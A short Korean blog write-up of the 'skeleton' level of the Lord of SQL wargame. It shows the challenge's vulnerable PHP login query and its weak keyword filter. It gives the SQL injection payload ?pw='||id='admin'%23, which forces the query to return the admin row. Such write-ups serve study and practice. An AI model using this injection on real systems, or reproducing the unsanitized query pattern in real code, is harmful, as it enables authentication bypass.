query : select id from prob_skeleton where id='guest' and pw='' and 1=0
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id'] == 'admin') solve("skeleton");
highlight_file(__FILE__);
?>
if($result['id'] == 'admin') solve("skeleton");
쿼리의 결과값 id가 admin이면 문제가 풀립니다. id는 guest로 고정되어있고 pw에 괄호를 필터링하고 있습니다. 기존에 사용하던 방법 그대로 문제를 해결할 수 있습니다.
?pw='||id='admin'%23 |
payload
'Web > LOS (Lord of SQL)' 카테고리의 다른 글
| los(lord of sql) level 17 - succubus (0) | 2018.08.22 |
|---|---|
| los(lord of sql) level 16 - zombie_assassin (0) | 2018.08.22 |
| los(lord of sql) level 14 - giant (0) | 2018.08.22 |
| los(lord of sql) level 13 - bugbear (0) | 2018.08.21 |
| los(lord of sql) level 12 - darkknight (0) | 2018.08.21 |